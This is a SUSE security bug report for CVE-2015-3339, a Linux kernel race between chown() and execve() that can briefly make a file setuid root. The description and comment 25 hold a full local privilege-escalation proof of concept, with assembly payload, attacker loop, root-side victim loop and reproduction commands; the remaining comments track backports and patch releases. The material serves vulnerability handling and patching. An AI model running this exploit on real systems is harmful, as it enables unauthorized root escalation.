Bug 928130 (CVE-2015-3339)

Summary: VUL-0: CVE-2015-3339: kernel: race condition between chown() and execve()
Product: [Novell Products] SUSE Security Incidents Reporter: Andreas Stieger <astieger>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: jsegitz, mbenes, meissner, mhocko, mszeredi, ptesarik, smash_bz
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/116174/
Whiteboard: maint:running:61844:important maint:released:sle11-sp3:61845 maint:released:sle11-sp3:61847 maint:released:sle11-sp3:61849 maint:released:sle11-sp3:61853 maint:released:sle11-sp3:61852 CVSSv2:NVD:CVE-2015-3339:6.2:(AV:L/AC:H/Au:N/C:C/I:C/A:C) maint:released:sle11-sp3:61909
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: backport for cve/linux-2.6.15
backport for cve/linux-2.6.16
a.asm
exec.c
chown2.c

Description Andreas Stieger 2015-04-22 09:07:35 UTC 
A race condition flaw was found between the chown() and execve() system calls. When changing the owner of a setuid-user binary to root, the race condition could momentarily make the binary setuid root. When root chown()ed an attacker-owned setuid file to root, the file briefly was setuid root (and executable as such).

Upstream patch:

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b01fc86b9f425899f8a3a8fc1c47d73c2c20543

Additional details:

http://seclists.org/oss-sec/2015/q2/216

On non-ancient Linux machines, chown() clears the setuid and setgid bits.
However, until now, that was racy relative to execve(): While chown() took
the i_mutex while modifying owner, group and mode, execve() didn't take that
lock. Because chown() also set the user and group before setting the mode,
this meant that when root chown()ed an attacker-owned setuid file to root,
the file briefly was setuid root (and executable as such).

This was fixed here by taking the i_mutex in the execve path:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b01fc86b9f425899f8a3a8fc1c47d73c2c20543

Two programs for which this could be relevant are procmail and vsftpd.

vsftpd has this comment in privops.c (relevant only if the chown_uploads
option, which defaults to NO, is activated in the server config, see
process_post_login_req() in postprivparent.c):
  /* SECURITY! You need an OS which strips SUID/SGID bits on chown(),
   * otherwise a compromise of the FTP user will lead to compromise of
   * the "anon_upload_chown_uid" user (think chmod +s).
   */

procmail, when setuid root, does this when invoked as "procmail -d daemon" if
/var/mail/daemon does not exist yet (thanks to jduck for pointing me towards
procmail):
  chown("/var/mail/_QmG.F0wHVB.pc", 1, 8)

As far as I can tell, on a system where procmail is setuid root, this means
that an attacker who has gained access to the "mail" group, which has write
access to /var/mail, can use the chown race to escalate access to any non-root
uid. (procmail optimizes the chown away for root's mailbox.)

Note that *stat() can still show inconsistent data about uid, gid and mode.
This wasn't changed because the stat path is a lot hotter than execve and this
seems like a much bigger issue for execve() than for *stat().

Here's a simple PoC. exec.c is the attacker, chown2.c is the (privileged)
victim. You'll see the message "got root!" every time the attacker wins the
race.

Your console should get spammed with those messages rather quickly if you
don't uncomment the usleep - if you do uncomment it, it might take a while to
succeed or not work at all. On my desktop machine, it still won the race for
6% of all attempts, but on another machine, it seems like it doesn't work at
all with the usleep.

--------------------------------------------------------------------
# just use asm to avoid overhead of dynamic loader
$ cat > a.asm
bits 64

_start:
  mov rax, 107 ; SYS_geteuid
  syscall
  test rax, rax
  jnz exit
  mov rax, 1 ; SYS_write
  mov rdi, 1 ; stdout
  mov rsi, msg
  mov rdx, len
  syscall

exit:
  mov rax, 231 ; SYS_exit_group
  mov rdi, 0
  syscall

msg db 'got root!',0xa
len equ $ - msg
$ nasm -f elf64 -o a.o a.asm && ld -o a a.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000000400080
$ cat > exec.c
#include <stdio.h>
#include <unistd.h>

int main(void) {
  int i = 0;
  while (1) {
    pid_t pid = vfork();
    if (pid < 0) return 1;
    if (pid == 0) {
      char *argv[] = { "a", NULL };
      execve("a", argv, argv);
      puts("execfail");
      return 1;
    }
    wait(NULL);
  }
}
$ gcc -o exec exec.c
$ cat > chown2.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main(void) {
  int fd = open("a", 0);
  if (fd < 0) return 1;
  while (1) {
    //usleep(100000); /* uncomment to make it a bit more realistic */
    if (fchown(fd, 0, 0) < 0) return 1;
    if (fchown(fd, 1000, 1000) < 0) return 1;
    if (fchmod(fd, 06755) < 0) return 1;
  }
}
$ gcc -o chown2 chown2.c
$ sudo ./chown2 & ./exec



References:
http://seclists.org/oss-sec/2015/q2/216
https://bugzilla.redhat.com/show_bug.cgi?id=1214030
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3339
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-3339.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3339
Comment 1 Swamp Workflow Management 2015-04-22 22:00:39 UTC 
bugbot adjusting priority
Comment 2 Jiri Kosina 2015-04-23 14:27:18 UTC 
The exploit scenario is really odd. I personally wouldn't consider this too urgent / dangerous.
Comment 3 Miklos Szeredi 2015-04-27 15:45:59 UTC 
Pushed to:

  SLE11-SP3
  SLE12
  openSUSE-13.1
  openSUSE-13.2
Comment 4 Michal Hocko 2015-04-27 16:15:13 UTC 
Pushed to SLE11-SP3-TD branch as well. Are any older branches affected?
Comment 5 Miklos Szeredi 2015-04-27 18:54:14 UTC 
Race is there in SLE10 as well.  But I agree with Jiri, that it's really not likely to be exploitable.
Comment 7 Michal Hocko 2015-04-28 08:07:23 UTC 
Created attachment 632591 [details]
backport for cve/linux-2.6.15

This is a metpatch (aka git format-patch from the kernel-source tree).

The backport was little bit more tricky but I guess I got it right. Could you help me to double check Miklos, please?
Comment 8 Miklos Szeredi 2015-04-28 09:44:21 UTC 
Created attachment 632616 [details]
backport for cve/linux-2.6.16

I think this one has more of a chance.  Yours had problems: it didn't do the fast path without i_mutex and didn't actually call the helper.

The need for ACCESS_ONCE is dubious, but I backported it anyway.
Comment 9 Michal Hocko 2015-04-28 09:52:08 UTC 
(In reply to Miklos Szeredi from comment #8)
> Created attachment 632616 [details]
> backport for cve/linux-2.6.16
> 
> I think this one has more of a chance.  Yours had problems: it didn't do the
> fast path 

I was thinking about it but I've considered easy to review more important.

> without i_mutex and didn't actually call the helper.

Dang, forgot to do the final refresh.
 
> The need for ACCESS_ONCE is dubious, but I backported it anyway.

Anyway I went with your patch and pushed it to cve/linux-2.6.16 as well. Thanks for you help Miklos.

We are done here!
Comment 13 Swamp Workflow Management 2015-05-12 20:53:26 UTC 
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-05-19.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61701
Comment 14 Swamp Workflow Management 2015-05-19 15:55:50 UTC 
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-05-26.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61770
Comment 16 Swamp Workflow Management 2015-05-29 09:59:53 UTC 
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2015-06-12.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61844
Comment 17 Swamp Workflow Management 2015-06-08 12:17:21 UTC 
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-06-15.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61904
Comment 18 Swamp Workflow Management 2015-06-16 12:11:17 UTC 
SUSE-SU-2015:1071-1: An update that solves 13 vulnerabilities and has 31 fixes is now available.

Category: security (important)
Bug References: 899192,900881,909312,913232,914742,915540,916225,917125,919007,919018,920262,921769,922583,922734,922944,924664,924803,924809,925567,926156,926240,926314,927084,927115,927116,927257,927285,927308,927455,928122,928130,928135,928141,928708,929092,929145,929525,929883,930224,930226,930669,930786,931014,931130
CVE References: CVE-2014-3647,CVE-2014-8086,CVE-2014-8159,CVE-2015-1465,CVE-2015-2041,CVE-2015-2042,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-3331,CVE-2015-3332,CVE-2015-3339,CVE-2015-3636
Sources used:
SUSE Linux Enterprise Software Development Kit 12 (src):    kernel-docs-3.12.43-52.6.2, kernel-obs-build-3.12.43-52.6.2
SUSE Linux Enterprise Server 12 (src):    kernel-source-3.12.43-52.6.1, kernel-syms-3.12.43-52.6.1
SUSE Linux Enterprise Live Patching 12 (src):    kgraft-patch-SLE12_Update_5-1-2.3
SUSE Linux Enterprise Desktop 12 (src):    kernel-source-3.12.43-52.6.1, kernel-syms-3.12.43-52.6.1
Comment 19 Swamp Workflow Management 2015-07-02 15:23:23 UTC 
SUSE-SU-2015:1174-1: An update that solves 15 vulnerabilities and has 71 fixes is now available.

Category: security (moderate)
Bug References: 831029,877456,889221,891212,891641,900881,902286,904242,904883,904901,906027,908706,909309,909312,909477,909684,910517,911326,912202,912741,913080,913598,914726,914742,914818,914987,915045,915200,915577,916521,916848,917093,917120,917648,917684,917830,917839,918333,919007,919018,919357,919463,919589,919682,919808,921769,922583,923344,924142,924271,924333,924340,925012,925370,925443,925567,925729,926016,926240,926439,926767,927190,927257,927262,927338,928122,928130,928142,928333,928970,929145,929148,929283,929525,929647,930145,930171,930226,930284,930401,930669,930786,930788,931014,931015,931850
CVE References: CVE-2014-8086,CVE-2014-8159,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2015-0777,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2830,CVE-2015-2922,CVE-2015-3331,CVE-2015-3339,CVE-2015-3636
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    kernel-bigsmp-3.0.101-0.47.55.1, kernel-default-3.0.101-0.47.55.1, kernel-pae-3.0.101-0.47.55.1, kernel-source-3.0.101-0.47.55.1, kernel-syms-3.0.101-0.47.55.1, kernel-trace-3.0.101-0.47.55.1, kernel-xen-3.0.101-0.47.55.1
SUSE Linux Enterprise Server 11 SP3 (src):    kernel-bigsmp-3.0.101-0.47.55.1, kernel-default-3.0.101-0.47.55.1, kernel-ec2-3.0.101-0.47.55.1, kernel-pae-3.0.101-0.47.55.1, kernel-ppc64-3.0.101-0.47.55.1, kernel-source-3.0.101-0.47.55.1, kernel-syms-3.0.101-0.47.55.1, kernel-trace-3.0.101-0.47.55.1, kernel-xen-3.0.101-0.47.55.1, xen-4.2.5_08-0.7.1
SUSE Linux Enterprise High Availability Extension 11 SP3 (src):    cluster-network-1.4-2.28.1.21, gfs2-2-0.17.1.21, ocfs2-1.6-0.21.1.21
SUSE Linux Enterprise Desktop 11 SP3 (src):    kernel-bigsmp-3.0.101-0.47.55.1, kernel-default-3.0.101-0.47.55.1, kernel-pae-3.0.101-0.47.55.1, kernel-source-3.0.101-0.47.55.1, kernel-syms-3.0.101-0.47.55.1, kernel-trace-3.0.101-0.47.55.1, kernel-xen-3.0.101-0.47.55.1, xen-4.2.5_08-0.7.1
SLE 11 SERVER Unsupported Extras (src):    kernel-bigsmp-3.0.101-0.47.55.1, kernel-default-3.0.101-0.47.55.1, kernel-pae-3.0.101-0.47.55.1, kernel-ppc64-3.0.101-0.47.55.1, kernel-xen-3.0.101-0.47.55.1
Comment 21 Swamp Workflow Management 2015-08-12 17:26:16 UTC 
SUSE-SU-2015:1376-1: An update that solves 15 vulnerabilities and has 71 fixes is now available.

Category: security (important)
Bug References: 831029,877456,889221,891212,891641,900881,902286,904242,904883,904901,906027,908706,909309,909312,909477,909684,910517,911326,912202,912741,913080,913598,914726,914742,914818,914987,915045,915200,915577,916521,916848,917093,917120,917648,917684,917830,917839,918333,919007,919018,919357,919463,919589,919682,919808,921769,922583,923344,924142,924271,924333,924340,925012,925370,925443,925567,925729,926016,926240,926439,926767,927190,927257,927262,927338,928122,928130,928142,928333,928970,929145,929148,929283,929525,929647,930145,930171,930226,930284,930401,930669,930786,930788,931014,931015,931850
CVE References: CVE-2014-8086,CVE-2014-8159,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2015-0777,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2830,CVE-2015-2922,CVE-2015-3331,CVE-2015-3339,CVE-2015-3636
Sources used:
SUSE Linux Enterprise Real Time Extension 11 SP3 (src):    cluster-network-1.4-2.28.1.22, drbd-kmp-8.4.4-0.23.1.22, iscsitarget-1.4.20-0.39.1.22, kernel-rt-3.0.101.rt130-0.33.38.1, kernel-rt_trace-3.0.101.rt130-0.33.38.1, kernel-source-rt-3.0.101.rt130-0.33.38.1, kernel-syms-rt-3.0.101.rt130-0.33.38.1, lttng-modules-2.1.1-0.12.1.20, ocfs2-1.6-0.21.1.22, ofed-1.5.4.1-0.14.1.22
Comment 22 Marcus Meissner 2015-09-01 13:11:35 UTC 
Created attachment 645797 [details]
a.asm

nasm -f elf64 -o a.o a.asm && ld -o a a.o
Comment 23 Marcus Meissner 2015-09-01 13:11:59 UTC 
Created attachment 645798 [details]
exec.c

gcc -o exec exec.c
Comment 24 Marcus Meissner 2015-09-01 13:12:26 UTC 
Created attachment 645799 [details]
chown2.c

gcc -o chown2 chown2.c
Comment 25 Marcus Meissner 2015-09-01 13:13:25 UTC 
REPRODUCER:

change to a setuid capable directory. (so not NFS, but /tmp or local /home)

as user:
nasm -f elf64 -o a.o a.asm && ld -o a a.o
gcc -o exec exec.c
gcc -o chown2 chown2.c


then

sudo su ls
<enter rootpassword so the timestamp is set>

sudo ./chown2 & exec
Comment 29 Swamp Workflow Management 2016-02-01 15:18:11 UTC 
openSUSE-SU-2016:0301-1: An update that solves 57 vulnerabilities and has 21 fixes is now available.

Category: security (important)
Bug References: 814440,851610,869564,873385,906545,907818,909077,909477,911326,912202,915517,915577,917830,918333,919007,919018,919463,919596,921313,921949,922583,922936,922944,926238,926240,927780,927786,928130,929525,930399,931988,932348,933896,933904,933907,933934,935542,935705,936502,936831,937032,937033,937969,938706,940338,944296,945825,947155,949936,950998,951194,951440,951627,952384,952579,952976,953052,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075
CVE References: CVE-2014-2568,CVE-2014-8133,CVE-2014-8989,CVE-2014-9090,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2014-9715,CVE-2014-9728,CVE-2014-9729,CVE-2014-9730,CVE-2014-9731,CVE-2015-0272,CVE-2015-0777,CVE-2015-1420,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-2925,CVE-2015-3212,CVE-2015-3339,CVE-2015-3636,CVE-2015-4001,CVE-2015-4002,CVE-2015-4003,CVE-2015-4004,CVE-2015-4036,CVE-2015-4167,CVE-2015-4692,CVE-2015-4700,CVE-2015-5157,CVE-2015-5283,CVE-2015-5307,CVE-2015-5364,CVE-2015-5366,CVE-2015-5707,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7833,CVE-2015-7872,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE 13.1 (src):    cloop-2.639-11.22.2, crash-7.0.2-2.22.2, hdjmod-1.28-16.22.2, ipset-6.21.1-2.26.2, iscsitarget-1.4.20.3-13.22.2, kernel-debug-3.11.10-32.1, kernel-default-3.11.10-32.1, kernel-desktop-3.11.10-32.1, kernel-docs-3.11.10-32.3, kernel-ec2-3.11.10-32.1, kernel-pae-3.11.10-32.1, kernel-source-3.11.10-32.1, kernel-syms-3.11.10-32.1, kernel-trace-3.11.10-32.1, kernel-vanilla-3.11.10-32.1, kernel-xen-3.11.10-32.1, ndiswrapper-1.58-22.1, pcfclock-0.44-258.22.1, vhba-kmp-20130607-2.23.1, virtualbox-4.2.36-2.55.1, xen-4.3.4_10-56.1, xtables-addons-2.3-2.22.1
Comment 30 Marcus Meissner 2016-03-23 08:29:53 UTC 
released
Comment 31 Swamp Workflow Management 2016-08-15 14:09:40 UTC 
SUSE-SU-2016:2074-1: An update that solves 48 vulnerabilities and has 13 fixes is now available.

Category: security (important)
Bug References: 816446,861093,928130,935757,939826,942367,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-2015,CVE-2013-7446,CVE-2015-0272,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-source-3.0.101-0.7.40.1, kernel-syms-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1
Comment 32 Swamp Workflow Management 2016-10-26 16:09:25 UTC 
openSUSE-SU-2016:2649-1: An update that solves 49 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1004418,758540,816446,861093,917648,928130,935757,939826,942367,944296,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,969356,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-1339,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486,CVE-2016-5195
Sources used:
openSUSE Evergreen 11.4 (src):    kernel-debug-3.0.101-105.1, kernel-default-3.0.101-105.1, kernel-desktop-3.0.101-105.1, kernel-docs-3.0.101-105.2, kernel-ec2-3.0.101-105.1, kernel-pae-3.0.101-105.1, kernel-source-3.0.101-105.1, kernel-syms-3.0.101-105.1, kernel-trace-3.0.101-105.1, kernel-vanilla-3.0.101-105.1, kernel-vmi-3.0.101-105.1, kernel-xen-3.0.101-105.1, preload-1.2-6.83.1